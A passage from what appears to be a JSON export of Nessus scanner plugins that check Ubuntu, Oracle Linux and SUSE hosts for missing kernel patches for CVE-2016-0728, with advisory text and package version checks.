script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:15", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2870-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88010);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-lowlatency\", pkgver:\"3.13.0-76.120\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:03", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2016-0064 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : kernel (ELSA-2016-0064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88168", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-0064.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88168);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2016-0064)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2016-0064 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1\n mishandles object references in a certain error case, which allows local users to gain privileges or cause\n a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2016-0064.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['3.10.0-327.4.5.el7'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2016-0064');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '3.10';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'kernel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-3.10.0'},\n {'reference':'kernel-abi-whitelists-3.10.0-327.4.5.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-abi-whitelists-3.10.0'},\n {'reference':'kernel-debug-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-3.10.0'},\n {'reference':'kernel-debug-devel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-3.10.0'},\n {'reference':'kernel-devel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-3.10.0'},\n {'reference':'kernel-headers-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-3.10.0'},\n {'reference':'kernel-tools-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-tools-3.10.0'},\n {'reference':'kernel-tools-libs-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-tools-libs-3.10.0'},\n {'reference':'kernel-tools-libs-devel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-tools-libs-devel-3.10.0'},\n {'reference':'perf-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:48", "description": "The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with join_session_keyring() could lead to local attackers gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0205-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0205-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88144", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0205-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88144);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0205-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to receive a security\nfix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0728/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160205-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fd53631\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-137=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-137=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-137=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-137=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-137=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-137=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 